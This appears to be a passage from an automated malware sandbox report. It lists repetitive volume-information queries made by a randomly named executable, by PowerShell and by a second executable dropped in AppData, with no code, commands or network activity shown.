Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
